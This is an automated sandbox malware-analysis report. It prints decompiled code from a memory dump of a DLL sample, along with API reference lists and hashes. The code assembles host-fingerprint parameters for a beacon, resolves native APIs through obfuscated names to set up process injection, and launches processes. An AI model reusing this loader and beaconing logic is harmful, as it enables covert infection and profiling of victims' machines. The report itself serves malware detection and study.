0x007db102
0x007db1a2
0x007db1a9

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 4497d7545912f2d4058761b7b65b65f399d36d2545feced4d068d311e18ce7d1
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: E421C432900208EBCB10DF69C8D49ABB7B5FF49350B468169E8559B345D735F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 007D96CE, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E007D96CE(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x7dd018; // 0x639b57ef
				asm("bswap eax");
				_t27 =  *0x7dd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x7dd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x7dd00c; // 0x81762942
				asm("bswap eax");
				_t30 =  *0x7dd27c; // 0x2bda5a8
				_t3 = _t30 + 0x7de633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d151, _t29, _t28, _t27, _t26,  *0x7dd02c,  *0x7dd004, _t25);
				_t33 = E007D6C9B();
				_t34 =  *0x7dd27c; // 0x2bda5a8
				_t4 = _t34 + 0x7de673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E007D570D(_t91);
				if(_t96 != 0) {
					_t83 =  *0x7dd27c; // 0x2bda5a8
					_t6 = _t83 + 0x7de8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x7dd238, 0, _t96);
				}
				_t97 = E007D9525();
				if(_t97 != 0) {
					_t78 =  *0x7dd27c; // 0x2bda5a8
					_t8 = _t78 + 0x7de8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x7dd238, 0, _t97);
				}
				_t98 =  *0x7dd32c; // 0x33b95b0
				_a32 = E007D4511( &E007DD00A, _t98 + 4);
				_t42 =  *0x7dd2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x7dd27c; // 0x2bda5a8
					_t11 = _t74 + 0x7de8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x7dd2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x7dd27c; // 0x2bda5a8
					_t13 = _t71 + 0x7de8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x7dd238, 0, 0x800);
					if(_t100 != 0) {
						E007DA47F(GetTickCount());
						_t50 =  *0x7dd32c; // 0x33b95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x7dd32c; // 0x33b95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x7dd32c; // 0x33b95b0
						_t103 = E007D8386(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x7dc2ac);
							_push(_t103);
							_t62 = E007D41B9();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E007D45DE(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E007D48E8();
								}
								HeapFree( *0x7dd238, 0, _v44);
							}
							HeapFree( *0x7dd238, 0, _t103);
						}
						HeapFree( *0x7dd238, 0, _t100);
					}
					HeapFree( *0x7dd238, 0, _a24);
				}
				HeapFree( *0x7dd238, 0, _t105);
				return _a12;
			}

0x007d96ce
0x007d96ce
0x007d96ce
0x007d96d5
0x007d96db
0x007d96e3
0x007d96e5
0x007d96e5
0x007d96f2
0x007d96fd
0x007d9700
0x007d970b
0x007d970e
0x007d9713
0x007d9716
0x007d971b
0x007d971e
0x007d972a
0x007d9737
0x007d9739
0x007d973f
0x007d9744
0x007d974f
0x007d9751
0x007d9754
0x007d975b
0x007d975f
0x007d9761
0x007d9766
0x007d9772
0x007d9774
0x007d9780
0x007d9782
0x007d9782
0x007d978d
0x007d9791
0x007d9793
0x007d9798
0x007d97a4
0x007d97a6
0x007d97b2
0x007d97b4
0x007d97b4
0x007d97ba
0x007d97cd
0x007d97d1
0x007d97d8
0x007d97db
0x007d97e0
0x007d97eb
0x007d97ed
0x007d97f0
0x007d97f0
0x007d97f2
0x007d97f9
0x007d97fc
0x007d9801
0x007d980b
0x007d980d
0x007d9815
0x007d982e
0x007d9832
0x007d983e
0x007d9843
0x007d984c
0x007d985d
0x007d9861
0x007d986a
0x007d9870
0x007d987d
0x007d988a
0x007d9890
0x007d989c
0x007d98a2
0x007d98a3
0x007d98aa
0x007d98ae
0x007d98b4
0x007d98bb
0x007d98c2
0x007d98c8
0x007d98cf
0x007d98d3
0x007d98de
0x007d98e5
0x007d98e9
0x007d98f2
0x007d98f2
0x007d9903
0x007d9903
0x007d9912
0x007d9912
0x007d9921
0x007d9921
0x007d9933
0x007d9933
0x007d9942
0x007d9953

APIs

GetTickCount.KERNEL32 ref: 007D96E5
wsprintfA.USER32 ref: 007D9732
wsprintfA.USER32 ref: 007D974F
wsprintfA.USER32 ref: 007D9772
HeapFree.KERNEL32(00000000,00000000), ref: 007D9782
wsprintfA.USER32 ref: 007D97A4
HeapFree.KERNEL32(00000000,00000000), ref: 007D97B4
wsprintfA.USER32 ref: 007D97EB
wsprintfA.USER32 ref: 007D980B
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007D9828
GetTickCount.KERNEL32 ref: 007D9838
RtlEnterCriticalSection.NTDLL(033B9570), ref: 007D984C
RtlLeaveCriticalSection.NTDLL(033B9570), ref: 007D986A

Part of subcall function 007D8386: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,007D987D,?,033B95B0), ref: 007D83B1
Part of subcall function 007D8386: lstrlen.KERNEL32(?,?,?,007D987D,?,033B95B0), ref: 007D83B9
Part of subcall function 007D8386: strcpy.NTDLL ref: 007D83D0
Part of subcall function 007D8386: lstrcat.KERNEL32(00000000,?), ref: 007D83DB
Part of subcall function 007D8386: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,007D987D,?,033B95B0), ref: 007D83F8

StrTrimA.SHLWAPI(00000000,007DC2AC,?,033B95B0), ref: 007D989C

Part of subcall function 007D41B9: lstrlen.KERNEL32(033B9978,00000000,00000000,745EC740,007D98A8,00000000), ref: 007D41C9
Part of subcall function 007D41B9: lstrlen.KERNEL32(?), ref: 007D41D1
Part of subcall function 007D41B9: lstrcpy.KERNEL32(00000000,033B9978), ref: 007D41E5
Part of subcall function 007D41B9: lstrcat.KERNEL32(00000000,?), ref: 007D41F0

lstrcpy.KERNEL32(00000000,?), ref: 007D98BB
lstrcpy.KERNEL32(00000000,00000000), ref: 007D98C2
lstrcat.KERNEL32(00000000,?), ref: 007D98CF
lstrcat.KERNEL32(00000000,00000000), ref: 007D98D3

Part of subcall function 007D45DE: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,73BB81D0), ref: 007D4690

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 007D9903
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007D9912
HeapFree.KERNEL32(00000000,00000000,?,033B95B0), ref: 007D9921
HeapFree.KERNEL32(00000000,00000000), ref: 007D9933
HeapFree.KERNEL32(00000000,?), ref: 007D9942

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: ceadeb7e520af91453f0d2d966c3331d5b0670d9379c074ea78a33e66bda7a5e
Instruction ID: 037d11da30a8242a3c7486005dc124ded929d08d2c92fb5ecd178ca33307c01b
Opcode Fuzzy Hash: ceadeb7e520af91453f0d2d966c3331d5b0670d9379c074ea78a33e66bda7a5e
Instruction Fuzzy Hash: CE617A71502201EFD722AB68EC48F5A7BF8EB48710F058116F948D7260EB3DEC15DB69

Uniqueness

Uniqueness Score: -1.00%

Function 007D551A, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E007D551A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x7dd33c; // 0x33b9bb8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E007DA7AA(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x7dc1ac;
				}
				_t46 = E007D4F9F(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E007D3727(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x7dd27c; // 0x2bda5a8
						_t16 = _t75 + 0x7deb28; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E007DA7AA(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x7dc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E007D3727(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E007D6EF8(_v20);
						} else {
							_t66 =  *0x7dd27c; // 0x2bda5a8
							_t31 = _t66 + 0x7dec48; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E007D6EF8(_v12);
				}
				return _v24;
			}

0x007d5522
0x007d5528
0x007d552f
0x007d5535
0x007d5539
0x007d553d
0x007d5540
0x007d5547
0x007d554a
0x007d554c
0x007d554c
0x007d5555
0x007d555c
0x007d555f
0x007d5565
0x007d556f
0x007d5578
0x007d557f
0x007d5598
0x007d559f
0x007d55a2
0x007d55ab
0x007d55b4
0x007d55c5
0x007d55ce
0x007d55d2
0x007d55d6
0x007d55dd
0x007d55e0
0x007d55e2
0x007d55e2
0x007d55ec
0x007d55f5
0x007d55fc
0x007d5614
0x007d5618
0x007d5655
0x007d561a
0x007d561d
0x007d5625
0x007d5636
0x007d5642
0x007d564a
0x007d564e
0x007d564e
0x007d5618
0x007d565d
0x007d5662
0x007d5669

APIs

GetTickCount.KERNEL32 ref: 007D552F
lstrlen.KERNEL32(?,80000002,00000005), ref: 007D556F
lstrlen.KERNEL32(00000000), ref: 007D5578
lstrlen.KERNEL32(00000000), ref: 007D557F
lstrlenW.KERNEL32(80000002), ref: 007D558C
wsprintfW.USER32 ref: 007D55C5
lstrlen.KERNEL32(?,00000004), ref: 007D55EC
lstrlen.KERNEL32(?), ref: 007D55F5
lstrlen.KERNEL32(?), ref: 007D55FC
lstrlenW.KERNEL32(?), ref: 007D5603
wsprintfW.USER32 ref: 007D5636

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: c58fa32c6fd0a9a1be4626ed1fbea3d79bd3f31a5338ec94b2e4da8c77e0b3cd
Instruction ID: 02ebc253ef2127ab6c9c78b05fb1f0fc7142e912b8721c1d5eb60c90849d6f8d
Opcode Fuzzy Hash: c58fa32c6fd0a9a1be4626ed1fbea3d79bd3f31a5338ec94b2e4da8c77e0b3cd
Instruction Fuzzy Hash: E2414C76900119FBCF12AFA4CD09E9EBBB5FF44354F054062FD04A7261D73A9A11EB94

Uniqueness

Uniqueness Score: -1.00%

Function 007D6F44, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E007D6F44(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t69 =  *((intOrPtr*)(__eax + 0x14));
				_t36 = E007D884A(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E007DA880( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x7dd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x7dd27c; // 0x2bda5a8
					_t18 = _t47 + 0x7de3e6; // 0x73797325
					_t68 = E007D8D0B(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x7dd27c; // 0x2bda5a8
						_t19 = _t50 + 0x7de747; // 0x33b8cef
						_t20 = _t50 + 0x7de0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E007D80DF();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E007D80DF();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x7dd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E007D6EF8(_t70);
				goto L12;
			}

0x007d6f4c
0x007d6f5b
0x007d6f64
0x007d6f67
0x007d7074
0x007d707b
0x007d707b
0x007d6f76
0x007d6f7e
0x007d6f83
0x007d6f86
0x007d6f9b
0x007d6fa1
0x007d6fa2
0x007d6fa5
0x007d6fab
0x007d6fae
0x007d6fb3
0x007d6fbb
0x007d6fc7
0x007d6fcb
0x007d705b
0x007d6fd1
0x007d6fd1
0x007d6fd6
0x007d6fdd
0x007d6ff1
0x007d6ff5
0x007d7044
0x007d6ff7
0x007d6ff8
0x007d6fff
0x007d7018
0x007d701a
0x007d701e
0x007d7025
0x007d703f
0x007d7027
0x007d7030
0x007d7035
0x007d7035
0x007d7025
0x007d7053
0x007d7053
0x007d6fcb
0x007d7062
0x007d706b
0x007d706f
0x00000000

APIs

Part of subcall function 007D884A: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,?,00000000,?,?,?,007D6F60,?,00000001,?,?,00000000,00000000), ref: 007D886F
Part of subcall function 007D884A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 007D8891
Part of subcall function 007D884A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 007D88A7
Part of subcall function 007D884A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007D88BD
Part of subcall function 007D884A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007D88D3
Part of subcall function 007D884A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007D88E9

memset.NTDLL ref: 007D6FAE

Part of subcall function 007D8D0B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,007D59DA,63699BCE,007D7E23,73797325), ref: 007D8D1C
Part of subcall function 007D8D0B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007D8D36

GetModuleHandleA.KERNEL32(4E52454B,033B8CEF,73797325), ref: 007D6FE4
GetProcAddress.KERNEL32(00000000), ref: 007D6FEB
HeapFree.KERNEL32(00000000,00000000), ref: 007D7053

Part of subcall function 007D80DF: GetProcAddress.KERNEL32(36776F57,007D4216), ref: 007D80FA

CloseHandle.KERNEL32(00000000,00000001), ref: 007D7030
CloseHandle.KERNEL32(?), ref: 007D7035
GetLastError.KERNEL32(00000001), ref: 007D7039

Strings

7}, xrefs: 007D6F44

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: 7}
API String ID: 3075724336-1518483753
Opcode ID: ef78ae94294c4b5073454dfb82283b06fe6eee4bd4f014b855a58abd6533f8bf
Instruction ID: 4f2c8196432a2355259bfa2a2287ed15938c3175c55196a3d3c58509692fde3b
Opcode Fuzzy Hash: ef78ae94294c4b5073454dfb82283b06fe6eee4bd4f014b855a58abd6533f8bf
Instruction Fuzzy Hash: 4E313F72904209FFDB21AFA4DC89D9EBBB8EB08344F108566F505A7251D778AD44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 007D8386, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E007D8386(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x7dd27c; // 0x2bda5a8
				_t1 = _t9 + 0x7de62c; // 0x253d7325
				_t36 = 0;
				_t28 = E007D8FC4(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E007D3727(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E007D8B04(_t34, _t41, _a8);
						E007D6EF8(_t41);
						_t42 = E007D5A2E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E007D6EF8(_t36);
							_t36 = _t42;
						}
						_t43 = E007D575F(_t36, _t33);
						if(_t43 != 0) {
							E007D6EF8(_t36);
							_t36 = _t43;
						}
					}
					E007D6EF8(_t28);
				}
				return _t36;
			}

0x007d8386
0x007d8389
0x007d838a
0x007d8392
0x007d8399
0x007d83a0
0x007d83a4
0x007d83aa
0x007d83b1
0x007d83b6
0x007d83c8
0x007d83cc
0x007d83d0
0x007d83d6
0x007d83db
0x007d83eb
0x007d83ed
0x007d8404
0x007d8408
0x007d840b
0x007d8410
0x007d8410
0x007d8419
0x007d841d
0x007d8420
0x007d8425
0x007d8425
0x007d841d
0x007d8428
0x007d8428
0x007d8433

APIs

Part of subcall function 007D8FC4: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,007D83A0,253D7325,00000000,00000000,745EC740,?,?,007D987D,?), ref: 007D902B
Part of subcall function 007D8FC4: sprintf.NTDLL ref: 007D904C

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,007D987D,?,033B95B0), ref: 007D83B1
lstrlen.KERNEL32(?,?,?,007D987D,?,033B95B0), ref: 007D83B9

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

strcpy.NTDLL ref: 007D83D0
lstrcat.KERNEL32(00000000,?), ref: 007D83DB

Part of subcall function 007D8B04: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,007D83EA,00000000,?,?,?,007D987D,?,033B95B0), ref: 007D8B1B

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,007D987D,?,033B95B0), ref: 007D83F8

Part of subcall function 007D5A2E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,007D8404,00000000,?,?,007D987D,?,033B95B0), ref: 007D5A38
Part of subcall function 007D5A2E: _snprintf.NTDLL ref: 007D5A96

Strings

=, xrefs: 007D83F2

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: a2abbfd101a22682e6742afebc4dac1cbb8fb67999939a989bd0a77856b43d2b
Instruction ID: dee9deafc7e2acf6744ba44d82d96398bba2b847f948836cb9046c910a9c2036
Opcode Fuzzy Hash: a2abbfd101a22682e6742afebc4dac1cbb8fb67999939a989bd0a77856b43d2b
Instruction Fuzzy Hash: 2611C2B7501526B74622BBB89C89C6F3BBDAE897607158127F504A7302DE3CDD0197A2

Uniqueness

Uniqueness Score: -1.00%

Function 007D884A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D884A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E007D3727(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x7dd27c; // 0x2bda5a8
					_t1 = _t23 + 0x7de11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x7dd27c; // 0x2bda5a8
					_t2 = _t26 + 0x7de769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E007D6EF8(_t54);
					} else {
						_t30 =  *0x7dd27c; // 0x2bda5a8
						_t5 = _t30 + 0x7de756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x7dd27c; // 0x2bda5a8
							_t7 = _t33 + 0x7de40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x7dd27c; // 0x2bda5a8
								_t9 = _t36 + 0x7de4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x7dd27c; // 0x2bda5a8
									_t11 = _t39 + 0x7de779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E007D7B2E(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x007d8859
0x007d885d
0x007d891f
0x007d8863
0x007d8863
0x007d8868
0x007d887b
0x007d887d
0x007d8882
0x007d888a
0x007d8891
0x007d8895
0x007d8898
0x007d8917
0x007d8918
0x007d889a
0x007d889a
0x007d889f
0x007d88a7
0x007d88ab
0x007d88ae
0x00000000
0x007d88b0
0x007d88b0
0x007d88b5
0x007d88bd
0x007d88c1
0x007d88c4
0x00000000
0x007d88c6
0x007d88c6
0x007d88cb
0x007d88d3
0x007d88d7
0x007d88da
0x00000000
0x007d88dc
0x007d88dc
0x007d88e1
0x007d88e9
0x007d88ed
0x007d88f0
0x00000000
0x007d88f2
0x007d88f8
0x007d88fd
0x007d8904
0x007d890b
0x007d890e
0x00000000
0x007d8910
0x007d8913
0x007d8913
0x007d890e
0x007d88f0
0x007d88da
0x007d88c4
0x007d88ae
0x007d8898
0x007d892d

APIs

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,?,00000000,?,?,?,007D6F60,?,00000001,?,?,00000000,00000000), ref: 007D886F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 007D8891
GetProcAddress.KERNEL32(00000000,614D775A), ref: 007D88A7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007D88BD
